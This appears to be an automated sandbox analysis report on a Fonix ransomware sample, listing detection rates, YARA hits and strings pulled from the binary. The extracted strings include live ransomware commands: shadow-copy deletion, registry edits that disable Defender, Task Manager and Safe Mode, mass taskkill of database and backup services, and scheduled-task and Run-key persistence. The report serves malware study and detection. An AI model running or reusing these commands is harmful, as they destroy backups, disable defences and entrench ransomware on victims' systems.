Source: fM498uO16Z.exe | Virustotal: Detection: 56% | Perma Link |
Source: fM498uO16Z.exe | Metadefender: Detection: 22% | Perma Link |
Source: fM498uO16Z.exe | ReversingLabs: Detection: 55% |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D89D0 CryptReleaseContext,_Init_thread_footer, | 0_2_011D89D0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D8290 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__std_exception_copy, | 0_2_011D8290 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D8AC0 CryptGenRandom,CryptReleaseContext, | 0_2_011D8AC0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D8400 GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,CryptReleaseContext, | 0_2_011D8400 |
Source: fM498uO16Z.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe |
Source: fM498uO16Z.exe | String found in binary or memory: https://code.jquery.com/jquery-latest.js |
Source: fM498uO16Z.exe | String found in binary or memory: https://uupload.ir/files/g510_windows_10.gif |
Source: fM498uO16Z.exe | String found in binary or memory: https://www.who.int |
Source: Yara match | File source: fM498uO16Z.exe, type: SAMPLE |
Source: Yara match | File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY |
Source: Yara match | File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: fM498uO16Z.exe, type: SAMPLE |
Source: Yara match | File source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: fM498uO16Z.exe PID: 1068, type: MEMORY |
Source: Yara match | File source: 0.2.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 0.0.fM498uO16Z.exe.1180000.0.unpack, type: UNPACKEDPE |
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: fM498uO16Z.exe | Binary or memory string: start cmd.exe /c vssadmin Delete Shadows /All /Quiet |
Source: fM498uO16Z.exe, 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: fM498uO16Z.exe | Binary or memory string: How To Decrypt Files.hta\Help.txt |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0122F14C | 0_2_0122F14C |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B31B0 | 0_2_011B31B0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0122F9E4 | 0_2_0122F9E4 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_012289F8 | 0_2_012289F8 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0121F880 | 0_2_0121F880 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01229888 | 0_2_01229888 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0118E0E0 | 0_2_0118E0E0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B1B40 | 0_2_011B1B40 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0121F394 | 0_2_0121F394 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0123A3FC | 0_2_0123A3FC |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0118CAD0 | 0_2_0118CAD0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01186D20 | 0_2_01186D20 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01195D40 | 0_2_01195D40 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011D9590 | 0_2_011D9590 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011813F0 | 0_2_011813F0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0122DD94 | 0_2_0122DD94 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B4DD0 | 0_2_011B4DD0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01226400 | 0_2_01226400 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_012154A4 | 0_2_012154A4 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01221CAC | 0_2_01221CAC |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011884A0 | 0_2_011884A0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01185CD0 | 0_2_01185CD0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01190F80 | 0_2_01190F80 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01225784 | 0_2_01225784 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B27D0 | 0_2_011B27D0 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_0121F618 | 0_2_0121F618 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011B4650 | 0_2_011B4650 |
Source: classification engine | Classification label: mal84.rans.evad.winEXE@1/0@0/0 |
Source: fM498uO16Z.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
Source: fM498uO16Z.exe | Virustotal: Detection: 56% |
Source: fM498uO16Z.exe | Metadefender: Detection: 22% |
Source: fM498uO16Z.exe | ReversingLabs: Detection: 55% |
Source: fM498uO16Z.exe | Static file information: File size 1266688 > 1048576 |
Source: fM498uO16Z.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT |
Source: | Binary string: C:\~Ransomware\Fonix - 4.3.2\x64\Release\Fonix.pdb source: fM498uO16Z.exe |
Source: fM498uO16Z.exe | Static PE information: section name: _RDATA |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_01189877 push rbp; iretd | 0_2_01189878 |
Source: C:\Users\user\Desktop\fM498uO16Z.exe | Code function: 0_2_011F10F0 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_011F10F0 |
Source: fM498uO16Z.exe | Binary or memory string: OUTPUT ERROR ::::].FONIXZIP FILECOPY TO PATH \CPUB.KEYREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM /V DISABLETASKMGR /T REG_DWORD /D 1 /FREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\POLICIES\MICROSOFT\WINDOWS DEFENDER" /V DISABLEANTISPYWARE /T REG_DWORD /D 1 /FREG DELETE HKEY_CURRENT_USER\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FREG DELETE HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SAFEBOOT /VA /FSTART CMD.EXE /C ICACLS * /GRANT EVERYONE:(OI)(CI)F /T /C /QSTART CMD.EXE /C TASKKILL /T /F /IM SQL* && TASKKILL /F /T /IM VEEAM* && TASKKILL /F /T /IM MSEXCHANGE* && TASKKILL /F /T /IM MICROSOFT.EXCHANGE* && TASKKILL /F /T /IM PVX* && TASKKILL /F /T /IM DBSRV* && EXITSTART UP ATTRIB +H +S "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"SCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /RU SYSTEM /RL HIGHEST /FCOPY C:\PROGRAMDATA\XINOF.EXE "%APPDATA%\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"COPY C:\PROGRAMDATA\XINOF.EXE "C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXE"C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\XINOF.EXEXINOF.EXESCHTASKS /CREATE /SC ONLOGON /TN FONIX /TR C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FREG ADD HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE\ /V "MICHAEL GILLESPIE" /T REG_SZ /D C:\PROGRAMDATA\XINOF.EXE /FFLAG C:\PROGRAMDATA\NONSNONSFLAGBLACK LIST MMS.EXESCHEDUL2.EXESCHEDHELP.EXETIB_MOUNTER_MONITOR.EXESQLIOSIM.EXESQLAGENT.EXESQLMAINT.EXESQLSTUBSS.EXECSRSS.EXESQLCEIP.EXEMSTSC.EXETASKMGR.EXESQLSERVR.EXEQBIDPSERVICE.EXESQLSERVER.EXEMSFTESQL.EXESQLAGENT.EXESQLBROWSER.EXESQLWRITER.EXEORACLE.EXEOCSSD.EXEDBSNMP.EXESYNCTIME.EXEMYDESKTOPQOS.EXEAGNTSVC.EXEISQLPPLUSSVC.EXEISQLPUSSVC.EXEXFSSVCCON.EXEMYDESKTOPSERVICE.EXEOCAUTOUPDS.EXEENCSVC.EXEFIREFOXCONFIG.EXETBIRDCONFIG.EXEOCOMM.EXEMYSQLD.EXEMYSQLD-NT.EXEMYSQLD-OPT.EXEDBENG50.EXESQBCORESERVICE.EXEEXCEL.EXEINFOPATH.EXEMSACCESS.EXEMSPUB.EXEONENOTE.EXEOUTLOOK.EXEPOWERPNT.EXESTREAM.EXETHEBAT.EXETHEBAT64.EXETHUNDERBIRD.EXEVISIO.EX |